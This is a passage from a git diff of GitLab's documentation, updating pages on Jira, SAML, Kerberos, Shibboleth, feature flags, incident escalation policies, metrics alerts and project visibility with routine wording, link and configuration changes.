it](#enable-or-disable-the-ability-to-require-an-associated-jira-issue-on-merge-requests). **(ULTIMATE SELF)** You can prevent merge requests from being merged if they do not refer to a Jira issue. To enforce this: @@ -125,7 +122,7 @@ Issues are grouped into tabs based on their - **Closed** tab: All issues with a Jira status categorized as Done. - **All** tab: All issues of any status. -## Search and filter the issues list +### Search and filter the issues list **(PREMIUM)** To refine the list of issues, use the search bar to search for any text contained in an issue summary (title) or description. Use any combination @@ -188,9 +185,9 @@ adding a comment to the Jira issue: ## Enable or disable the ability to require an associated Jira issue on merge requests The ability to require an associated Jira issue on merge requests is under development -and not ready for production use. It is deployed behind a feature flag that is -**disabled by default**. -[GitLab administrators with access to the GitLab Rails console](../../administration/feature_flags.md) can enable it. +but ready for production use. It is deployed behind a feature flag that is +**enabled by default**. +[GitLab administrators with access to the GitLab Rails console](../../administration/feature_flags.md) can opt to disable it. To enable it: diff --git a/doc/integration/kerberos.md b/doc/integration/kerberos.md index efff31bec99..5b827d23772 100644 --- a/doc/integration/kerberos.md +++ b/doc/integration/kerberos.md @@ -331,6 +331,11 @@ remove the OmniAuth provider named `kerberos` from your `gitlab.yml` / 1. [Reconfigure GitLab](../administration/restart_gitlab.md#omnibus-gitlab-reconfigure) for the changes to take effect. +NOTE: +Removing the `kerberos` OmniAuth provider can also resolve a rare +`Krb5Auth::Krb5::Exception (No credentials cache found)` error (`500` error in GitLab) +when trying to clone via HTTPS. + ## Support for Active Directory Kerberos environments When using Kerberos ticket-based authentication in an Active Directory domain, diff --git a/doc/integration/saml.md b/doc/integration/saml.md index 927dd3cd714..8e34f115072 100644 --- a/doc/integration/saml.md +++ b/doc/integration/saml.md @@ -201,6 +201,9 @@ For example configurations, see the [notes on specific providers](#providers). If a username is not specified, the email address is used to generate the GitLab username. +See [`attribute_statements`](#attribute_statements) for examples on how the +assertions are configured. + Please refer to [the OmniAuth SAML gem](https://github.com/omniauth/omniauth-saml/blob/master/lib/omniauth/strategies/saml.rb) for a full list of supported assertions. @@ -849,7 +852,7 @@ Another issue that can result in this error is when the correct information is b These errors all come from a similar place, the SAML certificate. SAML requests need to be validated using a fingerprint, a certificate or a validator. -For this you need take the following into account: +For this you need to take the following into account: - If a fingerprint is used, it must be the SHA1 fingerprint - If no certificate is provided in the settings, a fingerprint or fingerprint diff --git a/doc/integration/security_partners/index.md b/doc/integration/security_partners/index.md index 1cd14947e74..2b851b5f614 100644 --- a/doc/integration/security_partners/index.md +++ b/doc/integration/security_partners/index.md @@ -12,12 +12,18 @@ each security partner: <!-- vale gitlab.Spelling = NO --> +- [Accurics](https://readme.accurics.com/1409/) - [Anchore](https://docs.anchore.com/current/docs/using/integration/ci_cd/gitlab/) - [Bridgecrew](https://docs.bridgecrew.io/docs/integrate-with-gitlab-self-managed) - [Checkmarx](https://checkmarx.atlassian.net/wiki/spaces/SD/pages/1929937052/GitLab+Integration) +- [Deepfactor](https://docs.deepfactor.io/hc/en-us/articles/1500008981941) +- [GrammaTech](https://www.grammatech.com/codesonar-gitlab-integration) - [Indeni](https://indeni.com/doc-indeni-cloudrail/integrate-with-ci-cd/gitlab-instructions/) - [JScrambler](https://docs.jscrambler.com/code-integrity/documentation/gitlab-ci-integration) +- [Semgrep](https://semgrep.dev/for/gitlab) - [StackHawk](https://docs.stackhawk.com/continuous-integration/gitlab.html) +- [Venafi](https://marketplace.venafi.com/details/gitlab-ci-cd/) +- [Veracode](https://community.veracode.com/s/knowledgeitem/gitlab-ci-MCEKSYPRWL35BRTGOVI55SK5RI4A) - [WhiteSource](https://www.whitesourcesoftware.com/gitlab/) <!-- vale gitlab.Spelling = YES --> diff --git a/doc/integration/shibboleth.md b/doc/integration/shibboleth.md index c4cf19747be..4a3aa6b3dc5 100644 --- a/doc/integration/shibboleth.md +++ b/doc/integration/shibboleth.md @@ -1,151 +1,9 @@ --- -stage: Create -group: Ecosystem -info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +redirect_to: 'saml.md' +remove_date: '2021-09-29' --- -# Shibboleth OmniAuth Provider **(FREE)** +This file was moved to [another location](saml.md). -NOTE: -The preferred approach for integrating a Shibboleth authentication system -with GitLab 10 or newer is to use the [GitLab SAML integration](saml.md). This documentation is for Omnibus GitLab 9.x installs or older. - -To enable Shibboleth support in GitLab we need to use Apache instead of NGINX. (It may be possible to use NGINX, however this is difficult to configure using the bundled NGINX provided in the Omnibus GitLab package.) Apache uses `mod_shib2` module for Shibboleth authentication and can pass attributes as headers to OmniAuth Shibboleth provider. - -To enable the Shibboleth OmniAuth provider you must configure Apache Shibboleth module. -The installation and configuration of the module itself is out of the scope of this document. -Check [the Shibboleth documentation](https://wiki.shibboleth.net/confluence/display/SP3/Apache) for more information. - -You can find Apache configuration in [GitLab Recipes](https://gitlab.com/gitlab-org/gitlab-recipes/tree/master/web-server/apache). - -The following changes are needed to enable Shibboleth: - -1. Protect the OmniAuth Shibboleth callback URL: - - ```apache - <Location /users/auth/shibboleth/callback> - AuthType shibboleth - ShibRequestSetting requireSession 1 - ShibUseHeaders On - require valid-user - </Location> - - Alias /shibboleth-sp /usr/share/shibboleth - <Location /shibboleth-sp> - Satisfy any - </Location> - - <Location /Shibboleth.sso> - SetHandler shib - </Location> - ``` - -1. Exclude Shibboleth URLs from rewriting. Add `RewriteCond %{REQUEST_URI} !/Shibboleth.sso` and `RewriteCond %{REQUEST_URI} !/shibboleth-sp`. Configuration should look like this: - - ```apache - # Apache equivalent of Nginx try files - RewriteEngine on - RewriteCond %{DOCUMENT_ROOT}/%{REQUEST_FILENAME} !-f - RewriteCond %{REQUEST_URI} !/Shibboleth.sso - RewriteCond %{REQUEST_URI} !/shibboleth-sp - RewriteRule .* http://127.0.0.1:8080%{REQUEST_URI} [P,QSA] - RequestHeader set X_FORWARDED_PROTO 'https' - ``` - - NOTE: - In GitLab versions 11.4 and later, OmniAuth is enabled by default. If you're using an - earlier version, you must explicitly enable it in `/etc/gitlab/gitlab.rb`. - -1. In addition, add Shibboleth to `/etc/gitlab/gitlab.rb` as an OmniAuth provider. - User attributes are sent from the - Apache reverse proxy to GitLab as headers with the names from the Shibboleth - attribute mapping. Therefore the values of the `args` hash - should be in the form of `"HTTP_ATTRIBUTE"`. The keys in the hash are arguments - to the [OmniAuth::Strategies::Shibboleth class](https://github.com/toyokazu/omniauth-shibboleth/blob/master/lib/omniauth/strategies/shibboleth.rb) - and are documented by the [`omniauth-shibboleth` gem](https://github.com/toyokazu/omniauth-shibboleth) - (take care to note the version of the gem packaged with GitLab). If some of - your users appear to be authenticated by Shibboleth and Apache, but GitLab - rejects their account with a URI that contains "e-mail is invalid" then your - Shibboleth Identity Provider or Attribute Authority may be asserting multiple - e-mail addresses. In this instance, you might consider setting the - `multi_values` argument to `first`. - - The file should look like this: - - ```ruby - external_url 'https://gitlab.example.com' - gitlab_rails['internal_api_url'] = 'https://gitlab.example.com' - - # disable Nginx - nginx['enable'] = false - - gitlab_rails['omniauth_allow_single_sign_on'] = true - gitlab_rails['omniauth_block_auto_created_users'] = false - gitlab_rails['omniauth_providers'] = [ - { - "name" => "'shibboleth"', - "label" => "Text for Login Button", - "args" => { - "shib_session_id_field" => "HTTP_SHIB_SESSION_ID", - "shib_application_id_field" => "HTTP_SHIB_APPLICATION_ID", - "uid_field" => 'HTTP_EPPN', - "name_field" => 'HTTP_CN', - "info_fields" => { "email" => 'HTTP_MAIL'} - } - } - ] - - ``` - -1. [Reconfigure](../administration/restart_gitlab.md#omnibus-gitlab-reconfigure) or [restart](../administration/restart_gitlab.md#installations-from-source) GitLab for the changes to take effect if you - installed GitLab via Omnibus or from source respectively. - -On the sign in page, there should now be a **Sign in with: Shibboleth** icon below the regular sign in form. Click the icon to begin the authentication process. You are redirected to IdP server (depends on your Shibboleth module configuration). If everything goes well the user is returned to GitLab and is signed in. - -## Apache 2.4 / GitLab 8.6 update - -The order of the first 2 Location directives is important. If they are reversed, -requesting a Shibboleth session fails! - -```plaintext -<Location /> - Require all granted - ProxyPassReverse http://127.0.0.1:8181 - ProxyPassReverse http://YOUR_SERVER_FQDN/ -</Location> - -<Location /users/auth/shibboleth/callback> - AuthType shibboleth - ShibRequestSetting requireSession 1 - ShibUseHeaders On - Require shib-session -</Location> - -Alias /shibboleth-sp /usr/share/shibboleth - -<Location /shibboleth-sp> - Require all granted -</Location> - -<Location /Shibboleth.sso> - SetHandler shib -</Location> - -RewriteEngine on - -#Don't escape encoded characters in api requests -RewriteCond %{REQUEST_URI} ^/api/v4/.* -RewriteCond %{REQUEST_URI} !/Shibboleth.sso -RewriteCond %{REQUEST_URI} !/shibboleth-sp -RewriteRule .* http://127.0.0.1:8181%{REQUEST_URI} [P,QSA,NE] - -#Forward all requests to gitlab-workhorse except existing files -RewriteCond %{DOCUMENT_ROOT}/%{REQUEST_FILENAME} !-f [OR] -RewriteCond %{REQUEST_URI} ^/uploads/.* -RewriteCond %{REQUEST_URI} !/Shibboleth.sso -RewriteCond %{REQUEST_URI} !/shibboleth-sp -RewriteRule .* http://127.0.0.1:8181%{REQUEST_URI} [P,QSA] - -RequestHeader set X_FORWARDED_PROTO 'https' -RequestHeader set X-Forwarded-Ssl on -``` +<!-- This redirect file can be deleted after <2021-09-29>. --> +<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/intro/README.md b/doc/intro/README.md deleted file mode 100644 index 488d86f129d..00000000000 --- a/doc/intro/README.md +++ /dev/null @@ -1,9 +0,0 @@ ---- -redirect_to: 'index.md' -remove_date: '2021-05-11' ---- - -This document was moved to [another location](index.md). - -<!-- This redirect file can be deleted after 2021-05-11. --> -<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/legal/README.md b/doc/legal/README.md deleted file mode 100644 index 488d86f129d..00000000000 --- a/doc/legal/README.md +++ /dev/null @@ -1,9 +0,0 @@ ---- -redirect_to: 'index.md' -remove_date: '2021-05-11' ---- - -This document was moved to [another location](index.md). - -<!-- This redirect file can be deleted after 2021-05-11. --> -<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/migrate_ci_to_ce/index.md b/doc/migrate_ci_to_ce/index.md new file mode 100644 index 00000000000..dbe5a2730b5 --- /dev/null +++ b/doc/migrate_ci_to_ce/index.md @@ -0,0 +1,9 @@ +--- +redirect_to: 'https://docs.gitlab.com/' +remove_date: '2021-06-14' +--- + +This document was moved to [another location](https://docs.gitlab.com/). + +<!-- This redirect file can be deleted after <2021-09-14>. --> +<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/operations/error_tracking.md b/doc/operations/error_tracking.md index d4edf324caa..baaefcc3a0b 100644 --- a/doc/operations/error_tracking.md +++ b/doc/operations/error_tracking.md @@ -26,7 +26,7 @@ least Maintainer [permissions](../user/permissions.md) to enable the Sentry inte 1. Sign up to Sentry.io or [deploy your own](#deploying-sentry) Sentry instance. 1. [Create](https://docs.sentry.io/product/sentry-basics/guides/integrate-frontend/create-new-project/) a new Sentry project. For each GitLab project that you want to integrate, we recommend that you create a new Sentry project. 1. [Find or generate](https://docs.sentry.io/api/auth/) a Sentry auth token for your Sentry project. - Make sure to give the token at least the following scopes: `event:read` and `project:read`. + Make sure to give the token at least the following scopes: `event:read`, `project:read`, and `event:write` (for resolving events). 1. In GitLab, navigate to your project's **Monitor > Error Tracking** page, and click **Enable Error Tracking**. 1. Navigate to your project's **Settings > Monitor**. In the **Error Tracking** section, diff --git a/doc/operations/feature_flags.md b/doc/operations/feature_flags.md index 4045e46de04..a8686e2f4b7 100644 --- a/doc/operations/feature_flags.md +++ b/doc/operations/feature_flags.md @@ -80,7 +80,7 @@ You can apply a feature flag strategy across multiple environments, without defi the strategy multiple times. GitLab Feature Flags use [Unleash](https://docs.getunleash.io/) as the feature flag -engine. In Unleash, there are [strategies](https://docs.getunleash.io/docs/activation_strategy) +engine. In Unleash, there are [strategies](https://docs.getunleash.io/activation_strategy/) for granular feature flag controls. GitLab Feature Flags can have multiple strategies, and the supported strategies are: @@ -95,7 +95,7 @@ and clicking **{pencil}** (edit). ### All users -Enables the feature for all users. It uses the [`default`](https://docs.getunleash.io/docs/activation_strategy#default) +Enables the feature for all users. It uses the [`default`](https://docs.getunleash.io/activation_strategy/#default) Unleash activation strategy. ### Percent Rollout @@ -104,7 +104,7 @@ Unleash activation strategy. Enables the feature for a percentage of page views, with configurable consistency of behavior. This consistency is also known as stickiness. It uses the -[`flexibleRollout`](https://docs.getunleash.io/docs/activation_strategy#flexiblerollout) +[`flexibleRollout`](https://docs.getunleash.io/activation_strategy/#flexiblerollout) Unleash activation strategy. You can configure the consistency to be based on: @@ -133,7 +133,7 @@ Selecting **Random** provides inconsistent application behavior for individual u ### Percent of Users Enables the feature for a percentage of authenticated users. It uses the Unleash activation strategy -[`gradualRolloutUserId`](https://docs.getunleash.io/docs/activation_strategy#gradualrolloutuserid). +[`gradualRolloutUserId`](https://docs.getunleash.io/activation_strategy/#gradualrolloutuserid). For example, set a value of 15% to enable the feature for 15% of authenticated users. @@ -155,7 +155,7 @@ ID for the feature to be enabled. See the [Ruby example](#ruby-application-examp > - [Updated](https://gitlab.com/gitlab-org/gitlab/-/issues/34363) to be defined per environment in GitLab 12.6. Enables the feature for a list of target users. It is implemented -using the Unleash [`userWithId`](https://docs.getunleash.io/docs/activation_strategy#userwithid) +using the Unleash [`userWithId`](https://docs.getunleash.io/activation_strategy/#userwithid) activation strategy. Enter user IDs as a comma-separated list of values (for example, @@ -171,7 +171,7 @@ target users. See the [Ruby example](#ruby-application-example) below. > [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/35930) in GitLab 13.1. Enables the feature for lists of users created [in the Feature Flags UI](#create-a-user-list), or with the [Feature Flag User List API](../api/feature_flag_user_lists.md). -Similar to [User IDs](#user-ids), it uses the Unleash [`userWithId`](https://docs.getunleash.io/docs/activation_strategy#userwithid) +Similar to [User IDs](#user-ids), it uses the Unleash [`userWithId`](https://docs.getunleash.io/activation_strategy/#userwithid) activation strategy. It's not possible to *disable* a feature for members of a user list, but you can achieve the same @@ -392,8 +392,10 @@ end > - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/36617) in GitLab 13.2. > - [Feature flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/251234) in GitLab 13.5. +> - Showing related feature flags in issues [introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/220333) in GitLab 14.1. You can link related issues to a feature flag. In the **Linked issues** section, click the `+` button and input the issue reference number or the full URL of the issue. +The issues then appear in the related feature flag and the other way round. This feature is similar to the [linked issues](../user/project/issues/related_issues.md) feature. diff --git a/doc/operations/incident_management/alert_integrations.md b/doc/operations/incident_management/alert_integrations.md deleted file mode 100644 index b08ce8a0ad7..00000000000 --- a/doc/operations/incident_management/alert_integrations.md +++ /dev/null @@ -1,9 +0,0 @@ ---- -redirect_to: 'integrations.md' -remove_date: '2021-05-03' ---- - -This document was moved to [another location](integrations.md). - -<!-- This redirect file can be deleted after <2021-05-03>. --> -<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/operations/incident_management/alerts.md b/doc/operations/incident_management/alerts.md index def54d8dae2..7b6391cc76e 100644 --- a/doc/operations/incident_management/alerts.md +++ b/doc/operations/incident_management/alerts.md @@ -85,11 +85,10 @@ The **Alert details** tab has two sections. The top section provides a short lis > [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/217768) in GitLab 13.2. -The **Metrics** tab displays a metrics chart for alerts coming from Prometheus. If the alert originated from any other tool, the **Metrics** tab is empty. To set up alerts for GitLab-managed Prometheus instances, see [Managed Prometheus instances](../metrics/alerts.md#managed-prometheus-instances). For externally-managed Prometheus instances, you must configure your alerting -rules to display a chart in the alert. For information about how to configure +The **Metrics** tab displays a metrics chart for alerts coming from Prometheus. If the alert originated from any other tool, the **Metrics** tab is empty. +For externally-managed Prometheus instances, you must configure your alerting rules to display a chart in the alert. For information about how to configure your alerting rules, see [Embedding metrics based on alerts in incident issues](../metrics/embed.md#embedding-metrics-based-on-alerts-in-incident-issues). See -[External Prometheus instances](../metrics/alerts.md#external-prometheus-instances) -for information about setting up alerts for your self-managed Prometheus +[External Prometheus instances](../metrics/alerts.md#external-prometheus-instances) for information about setting up alerts for your self-managed Prometheus instance. To view the metrics for an alert: @@ -201,19 +200,6 @@ add a to-do item: Select the **To-Do List** **{todo-done}** in the navigation bar to view your current to-do list. -## Link runbooks to alerts - -> Runbook URLs [introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/39315) in GitLab 13.3. - -When creating alerts from the metrics dashboard for -[managed Prometheus instances](../metrics/alerts.md#managed-prometheus-instances), -you can link a runbook. When the alert triggers, you can access the runbook through -the [chart context menu](../metrics/dashboards/index.md#chart-context-menu) in the -upper-right corner of the metrics chart, making it easy for you to locate and access -the correct runbook: - - - ## View the environment that generated the alert > - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/232492) in GitLab 13.5 behind a feature flag, disabled by default. diff --git a/doc/operations/incident_management/escalation_policies.md b/doc/operations/incident_management/escalation_policies.md new file mode 100644 index 00000000000..9df8f0dbf7f --- /dev/null +++ b/doc/operations/incident_management/escalation_policies.md @@ -0,0 +1,43 @@ +--- +stage: Monitor +group: Monitor +info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +--- + +# Escalation Policies **(PREMIUM)** + +> [Introduced](https://gitlab.com/groups/gitlab-org/-/epics/4638) in [GitLab Premium](https://about.gitlab.com/pricing/) 14.1. + +Escalation Policies protect your company from missed critical alerts. Escalation Policies contain +time-boxed steps that automatically page the next responder in the escalation step if the responder +in the previous step has not responded. You can create an escalation policy in the GitLab project +where you manage [On-call schedules](oncall_schedules.md). + +## Add an escalation policy + +If you have at least Maintainer [permissions](../../user/permissions.md), +you can create an escalation policy: + +1. Go to **Operations > Escalation Policies** and select **Add an escalation policy**. +1. In the **Add escalation policy** form, enter the policy's name and description, and create + escalation rules to follow when a primary responder misses an alert. +1. Select **Add escalation policy**. + + + +### Edit an escalation policy + +Follow these steps to update an escalation policy: + +1. Go to **Operations > Escalation Policies** and select the **Pencil** icon on the top right of the + policy card, across from the policy name. +1. In the **Edit policy** form, edit the information you wish to update. +1. Select the **Edit policy** button to save your changes. + +### Delete an escalation policy + +Follow these steps to delete a policy: + +1. Go to **Operations > Escalation Policies** and select the **Trash Can** icon on the top right of + the policy card. +1. In the **Delete escalation policy** window, select the **Delete escalation policy** button. diff --git a/doc/operations/incident_management/img/escalation_policy_v14_1.png b/doc/operations/incident_management/img/escalation_policy_v14_1.png Binary files differnew file mode 100644 index 00000000000..89cd4318fcb --- /dev/null +++ b/doc/operations/incident_management/img/escalation_policy_v14_1.png diff --git a/doc/operations/incident_management/img/link_runbooks_to_alerts_v13_5.png b/doc/operations/incident_management/img/link_runbooks_to_alerts_v13_5.png Binary files differdeleted file mode 100644 index a63001b4cde..00000000000 --- a/doc/operations/incident_management/img/link_runbooks_to_alerts_v13_5.png +++ /dev/null diff --git a/doc/operations/incident_management/incidents.md b/doc/operations/incident_management/incidents.md index 1cb10fea566..385030d56de 100644 --- a/doc/operations/incident_management/incidents.md +++ b/doc/operations/incident_management/incidents.md @@ -56,7 +56,7 @@ With Maintainer or higher [permissions](../../user/permissions.md), you can enab 1. To customize the incident, select an [issue template](../../user/project/description_templates.md#create-an-issue-template). 1. To send [an email notification](paging.md#email-notifications) to users - with [Developer permissions](../../user/permissions.md), select + with the [Developer role](../../user/permissions.md), select **Send a separate email notification to Developers**. Email notifications are also sent to users with **Maintainer** and **Owner** permissions. 1. Click **Save changes**. diff --git a/doc/operations/incident_management/integrations.md b/doc/operations/incident_management/integrations.md index d2c52123838..f6c85045fa0 100644 --- a/doc/operations/incident_management/integrations.md +++ b/doc/operations/incident_management/integrations.md @@ -18,8 +18,8 @@ to use this endpoint. > [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/245331) in GitLab Free 13.5. -With the [Maintainer role or higher](../../user/permissions.md), -you can view the list of configured alerts integrations by navigating to **Settings > Monitor** +With at least the [Maintainer role](../../user/permissions.md), you can view the list of configured +alerts integrations by navigating to **Settings > Monitor** in your project's sidebar menu, and expanding the **Alerts** section. The list displays the integration name, type, and status (enabled or disabled): diff --git a/doc/operations/metrics/alerts.md b/doc/operations/metrics/alerts.md index 16cfb05ad9a..ea4dd7e34cb 100644 --- a/doc/operations/metrics/alerts.md +++ b/doc/operations/metrics/alerts.md @@ -9,54 +9,10 @@ info: To determine the technical writer assigned to the Stage/Group associated w > [Moved](https://gitlab.com/gitlab-org/gitlab/-/issues/42640) to GitLab Free in 12.10. After [configuring metrics for your CI/CD environment](index.md), you can set up -alerting for Prometheus metrics depending on the location of your instances, and +alerting for Prometheus metrics, and [trigger actions from alerts](#trigger-actions-from-alerts) to notify your team when environment performance falls outside of the boundaries you set. -## Managed Prometheus instances - -> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/6590) in [GitLab Ultimate](https://about.gitlab.com/pricing/) 11.2 for [custom metrics](index.md#adding-custom-metrics), and GitLab 11.3 for [library metrics](../../user/project/integrations/prometheus_library/index.md). - -WARNING: -Managed Prometheus on Kubernetes is [deprecated](https://gitlab.com/gitlab-org/gitlab/-/issues/327796) -and scheduled for [removal in GitLab 14.0](https://gitlab.com/groups/gitlab-org/-/epics/4280). - -For managed Prometheus instances using auto configuration, you can -[configure alerts for metrics](index.md#adding-custom-metrics) directly in the -[metrics dashboard](index.md). To set an alert: - -1. In your project, navigate to **Monitor > Metrics**, -1. Identify the metric you want to create the alert for, and click the - **ellipsis** **{ellipsis_v}** icon in the top right corner of the metric. -1. Choose **Alerts**. -1. Set threshold and operator. -1. (Optional) Add a Runbook URL. -1. Click **Add** to save and activate the alert. - - - -To remove the alert, click back on the alert icon for the desired metric, and click **Delete**. - -### Link runbooks to alerts - -> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/39315) in GitLab 13.3. -> - [Deprecated](https://gitlab.com/groups/gitlab-org/-/epics/5877) in GitLab 13.11. -> - [Removed](https://gitlab.com/groups/gitlab-org/-/epics/4280) in GitLab 14.0. - -WARNING: -Linking runbooks to alerts through the alerts UI is [deprecated](https://gitlab.com/groups/gitlab-org/-/epics/5877) -and scheduled for [removal in GitLab 14.0](https://gitlab.com/groups/gitlab-org/-/epics/4280). -However, you can still add runbooks to your alert payload. They show up in the alert UI when the -alert is triggered. - -When creating alerts from the metrics dashboard for [managed Prometheus instances](#managed-prometheus-instances), -you can also link a runbook. When the alert triggers, the -[chart context menu](dashboards/index.md#chart-context-menu) on the metrics chart -links to the runbook, making it easy for you to locate and access the correct runbook -as soon as the alert fires: - - - ## Prometheus cluster integrations Alerts are not currently supported for [Prometheus cluster integrations](../../user/clusters/integrations.md). @@ -72,7 +28,7 @@ use with Prometheus webhooks. If you have manual configuration enabled, an This section contains the needed **URL** and **Authorization Key**. The **Reset Key** button invalidates the key and generates a new one. - + To send GitLab alert notifications, copy the **URL** and **Authorization Key** into the [`webhook_configs`](https://prometheus.io/docs/alerting/latest/configuration/#webhook_config) diff --git a/doc/operations/metrics/dashboards/img/panel_context_menu_v13_3.png b/doc/operations/metrics/dashboards/img/panel_context_menu_v13_3.png Binary files differdeleted file mode 100644 index 1259917608b..00000000000 --- a/doc/operations/metrics/dashboards/img/panel_context_menu_v13_3.png +++ /dev/null diff --git a/doc/operations/metrics/dashboards/img/panel_context_menu_v14_0.png b/doc/operations/metrics/dashboards/img/panel_context_menu_v14_0.png Binary files differnew file mode 100644 index 00000000000..78cce5d30b7 --- /dev/null +++ b/doc/operations/metrics/dashboards/img/panel_context_menu_v14_0.png diff --git a/doc/operations/metrics/dashboards/index.md b/doc/operations/metrics/dashboards/index.md index d7b748034d5..d59f72f2a91 100644 --- a/doc/operations/metrics/dashboards/index.md +++ b/doc/operations/metrics/dashboards/index.md @@ -123,7 +123,7 @@ You can take action related to a chart's data by clicking the **{ellipsis_v}** **More actions** dropdown box above the upper right corner of any chart on a dashboard: - + The options are: @@ -135,10 +135,6 @@ The options are: feature, logs narrow down to the selected time range. ([Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/122013) in GitLab 12.8.) - **Download CSV** - Data from Prometheus charts on the metrics dashboard can be downloaded as CSV. - [Copy link to chart](../embed.md#embedding-gitlab-managed-kubernetes-metrics) -- **Alerts** - Display any [alerts](../alerts.md) configured for this metric. -- **View Runbook** - Displays the runbook for an alert. For information about configuring - runbooks, read [Set up alerts for Prometheus metrics](../alerts.md). - ([Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/211844) in GitLab 13.3.) ### Timeline zoom and URL sharing diff --git a/doc/operations/metrics/dashboards/variables.md b/doc/operations/metrics/dashboards/variables.md index 31782b5c95f..4b083284819 100644 --- a/doc/operations/metrics/dashboards/variables.md +++ b/doc/operations/metrics/dashboards/variables.md @@ -16,7 +16,7 @@ Queries that continue to use the old format display no data. ## Predefined variables -GitLab supports a limited set of [CI/CD variables](../../../ci/variables/README.md) +GitLab supports a limited set of [CI/CD variables](../../../ci/variables/index.md) in the Prometheus query. This is particularly useful for identifying a specific environment, for example with `ci_environment_slug`. Variables for Prometheus queries must be lowercase. The supported variables are: diff --git a/doc/operations/metrics/img/prometheus_service_alerts.png b/doc/operations/metrics/img/prometheus_integration_alerts.png Binary files differindex 609c5e5196c..609c5e5196c 100644 --- a/doc/operations/metrics/img/prometheus_service_alerts.png +++ b/doc/operations/metrics/img/prometheus_integration_alerts.png diff --git a/doc/public_access/public_access.md b/doc/public_access/public_access.md index 5d07095ac3e..4a7e178072b 100644 --- a/doc/public_access/public_access.md +++ b/doc/public_access/public_access.md @@ -5,32 +5,39 @@ info: To determine the technical writer assigned to the Stage/Group associated w type: reference --- -# Public access +# Project visibility -GitLab allows [Owners](../user/permissions.md) to set a project's visibility as **public**, **internal**, -or **private**. These visibility levels affect who can see the project in the -public access directory (`/public` under your GitLab instance), like at <https://gitlab.com/public> +GitLab allows [Owners](../user/permissions.md) to set a project's visibility as: -## Visibility of projects +- **Public** +- **Internal** +- **Private** -### Public projects +These visibility levels affect who can see the project in the public access directory (`/public` +for your GitLab instance). For example, <https://gitlab.com/public>. + +## Public projects Public projects can be cloned **without any** authentication over HTTPS. They are listed in the public access directory (`/public`) for all users. -**Any logged in user** has [Guest permissions](../user/permissions.md) -on the repository. +**Any signed-in user** has the [Guest role](../user/permissions.md) on the repository. + +NOTE: +By default, `/public` is visible to unauthenticated users. However, if the +[**Public** visibility level](../user/admin_area/settings/visibility_and_access_controls.md#restricted-visibility-levels) +is restricted, `/public` is visible only to signed-in users. -### Internal projects +## Internal projects -Internal projects can be cloned by any logged in user except [external users](../user/permissions.md#external-users). +Internal projects can be cloned by any signed-in user except +[external users](../user/permissions.md#external-users). -They are also listed in the public access directory (`/public`), but only for logged -in users. +They are also listed in the public access directory (`/public`), but only for signed-in users. -Any logged in users except [external users](../user/permissions.md#external-users) have [Guest permissions](../user/permissions.md) -on the repository. +Any signed-in users except [external users](../user/permissions.md#external-users) have the +[Guest role](../user/permissions.md) on the repository. NOTE: From July 2019, the `Internal` visibility setting is disabled for new projects, groups, @@ -38,57 +45,22 @@ and snippets on GitLab.com. Existing projects, groups, and snippets using the `I visibility setting keep this setting. You can read more about the change in the [relevant issue](https://gitlab.com/gitlab-org/gitlab/-/issues/12388). -### Private projects +## Private projects Private projects can only be cloned and viewed by project members (except for guests). They appear in the public access directory (`/public`) for project members only. -### How to change project visibility +## Change project visibility 1. Go to your project's **Settings**. 1. Change **Visibility Level** to either Public, Internal, or Private. -## Visibility of groups - -NOTE: -[Starting with](https://gitlab.com/gitlab-org/gitlab-foss/-/merge_requests/3323) GitLab 8.6, -the group visibility has changed and can be configured the same way as projects. -In previous versions, a group's page was always visible to all users. - -Like with projects, the visibility of a group can be set to dictate whether -anonymous users, all signed in users, or only explicit group members can view -it. The restriction for visibility levels on the application setting level also -applies to groups, so if that's set to internal, the explore page is empty -for anonymous users. The group page now has a visibility level icon. - -Admin users cannot create subgroups or projects with higher visibility level than that of the immediate parent group. - -## Visibility of users - -The public page of a user, located at `/username`, is always visible whether -you are logged in or not. - -When visiting the public page of a user, you can only see the projects which -you are privileged to. - -If the public level is restricted, user profiles are only visible to logged in users. - -## Visibility of pages - -By default, the following directories are visible to unauthenticated users: - -- Public access (`/public`). -- Explore (`/explore`). -- Help (`/help`). - -However, if the access level of the `/public` directory is restricted, these directories are visible only to logged in users. - -## Restricting the use of public or internal projects +## Restrict use of public or internal projects -You can restrict the use of visibility levels for users when they create a project or a -snippet. This is useful to prevent users from publicly exposing their repositories -by accident. The restricted visibility settings do not apply to admin users. +You can restrict the use of visibility levels for users when they create a project or a snippet. +This is useful to prevent users from publicly exposing their repositories by accident. The +restricted visibility settings do not apply to admin users. For details, see [Restricted visibility levels](../user/admin_area/settings/visibility_and_access_controls.md#restricted-visibility-levels). diff --git a/doc/raketasks/README.md b/doc/raketasks/README.md deleted file mode 100644 index 488d86f129d..00000000000 --- a/doc/raketasks/README.md +++ /dev/null @@ -1,9 +0,0 @@ ---- -redirect_to: 'index.md' -remove_date: '2021-05-11' ---- - -This document was moved to [another location](index.md). - -<!-- This redirect file can be deleted after 2021-05-11. --> -<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/raketasks/backup_restore.md b/doc/raketasks/backup_restore.md index 1e130c67724..73360c3ee4b 100644 --- 